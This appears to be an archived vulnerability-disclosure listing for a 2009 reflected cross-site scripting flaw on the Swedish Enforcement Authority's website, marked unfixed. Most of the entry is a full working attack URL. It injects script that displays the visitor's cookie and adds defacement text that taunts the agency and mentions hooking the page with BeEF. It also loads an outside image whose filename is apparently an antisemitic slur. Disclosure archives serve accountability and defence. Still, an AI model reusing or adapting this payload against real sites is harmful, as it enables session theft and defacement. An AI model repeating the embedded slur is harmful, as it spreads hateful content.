Security researcher DellNull, has submitted on 15/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.kronofogden.se, which at the time of submission ranked 159295 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 15/05/2009 |
Date published: 03/07/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: DellNull |
Domain: www.kronofogden.se |
Category: XSS |
Pagerank: 159295 |
|---|
URL: http://www.kronofogden.se/4.383cc9f31134f01c98a80001705.html?sv.search.query.allwords=%3CSCRIPT%3E%3
C%2FSCRIPT%3E%3CSCRIPT%3Ealert(%27This+is+a+cookie+from+the+Swedish+Enforcement+Authority!\n%27%2Bdo
cument.cookie)%3B%3C%2FSCRIPT%3E%3Ch1%3E%3Cfont+color%3D%22red%22+size%3D%22%2B5%22%3EThe+Swedish+En
forcement+Authority!+%3Cbr%3E+You+give+people+records+of+non-payment+and+now+I+give+you+a+record+of+
poor+security%2C+see+%3Ca+href+%3D%27http%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dkronofogden.se%27%3Ehtt
p%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dkronofogden.se%3C%2Fa%3E+It%27s+a+shame+that+a+government+autho
rity+that+handles+sensitive+record+about+swedish+citizens+is+prone+to+security+flaws+in+their+system
s!+What+if+someone+places+a+xss+proxy+hook+(like+BeEF)+here%3F+The+privacy+for+swedish+citizens+is+s
upposed+to+be+protected+by+constitutional+laws.+So+live+by+the+law+or+die+by+the+law%3Cbr%3E%3Cbr%3E
-+DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg+src%3D%27http%3A%2F%2Fwww.jrbooksonline.com%2Fjew-bwa-ha-ha
.gif%27%3E&submit=S%C3%B6k |
|
Click here to view the mirror
|
|
|
| 
